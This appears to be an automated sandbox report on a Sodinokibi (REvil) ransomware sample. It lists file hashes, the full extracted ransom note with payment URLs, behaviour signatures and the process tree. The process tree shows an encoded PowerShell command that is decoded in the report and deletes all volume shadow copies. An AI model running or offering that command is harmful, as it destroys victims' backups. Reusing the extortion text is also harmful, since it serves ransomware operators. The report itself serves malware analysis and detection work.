Analysis

  • max time kernel
    147s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/06/2024, 17:29

General

  • Target

    9efbbace685671cc174a24989e4dda08_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    9efbbace685671cc174a24989e4dda08

  • SHA1

    9234b5bd774ca12b0fe46ce74c80f1ea76d85600

  • SHA256

    65980c4eba464e9bdaa06ac6bad34b90405c591769accb078ac352288be9def5

  • SHA512

    a2af96b0e6557c1f4bb4900f5abb0d39594847521156d37c33c7f3c744475bf8e91a8f14e0910e6c4f192da9aa25e40acd691b7efe841adcf95ac8670b140133

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3Qlz:ZJ0BXScFy2RsQJ8zglz

Malware Config

Extracted

  • Path

    C:\Recovery\1j6zsdt5-readme.txt

  • Family

    sodinokibi

  • Ransom Note

    ---=== Welcome. Again. ===---
    [+] Whats Happen? [+]
    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 1j6zsdt5.
    By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
    [+] What guarantees? [+]
    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
    To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
    If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
    [+] How to get access on website? [+]
    You have two ways:
    1) [Recommended] Using a TOR browser!
      a) Download and install TOR browser from this site: https://torproject.org/
      b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C368F7263F3A6B03
    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
      a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
      b) Open our secondary website: http://decryptor.cc/C368F7263F3A6B03
    Warning: secondary website can be blocked, thats why first variant much better and more available.
    When you open our website, put the following data in the input form:
    Key: [base64 victim key blob]
    -----------------------------------------------------------------------------------------
    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C368F7263F3A6B03

http://decryptor.cc/C368F7263F3A6B03

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Program Files directory (24 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (2 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\9efbbace685671cc174a24989e4dda08_JaffaCakes118.exe (depth 1)
    "C:\Users\Admin\AppData\Local\Temp\9efbbace685671cc174a24989e4dda08_JaffaCakes118.exe"
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of PID 3264)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} — i.e. deletion of every volume shadow copy, which is what triggers the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe start below)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
  • C:\Windows\system32\vssvc.exe (depth 1)
    C:\Windows\system32\vssvc.exe
    • Suspicious use of AdjustPrivilegeToken
    PID:3928
  • C:\Windows\system32\wbem\unsecapp.exe (depth 1)
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:632
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4036 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
    PID:3440

Downloads

  • C:\Recovery\1j6zsdt5-readme.txt

    Filesize

    6KB

    MD5

    960c4d938fb4b25d9943775b92baca6b

    SHA1

    f4e342d5822e528175039273532373bf23e2a5fa

    SHA256

    f10ae26f58b47709f2e949bac8316f35ec768219a0ec9f45689198b100af08d5

    SHA512

    57b2111a7f3471e51cf098d3612d0f125ee161f7b7f068c0efe13648295a842a92eefd58d25343dd48275304021d79480cedb0faa795772a128224ddf28e9cd5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vy5xtj5g.w2n.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2836-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp

    Filesize

    8KB

  • memory/2836-10-0x00000176DC180000-0x00000176DC1A2000-memory.dmp

    Filesize

    136KB

  • memory/2836-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

    Filesize

    10.8MB

  • memory/2836-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

    Filesize

    10.8MB

  • memory/2836-15-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

    Filesize

    10.8MB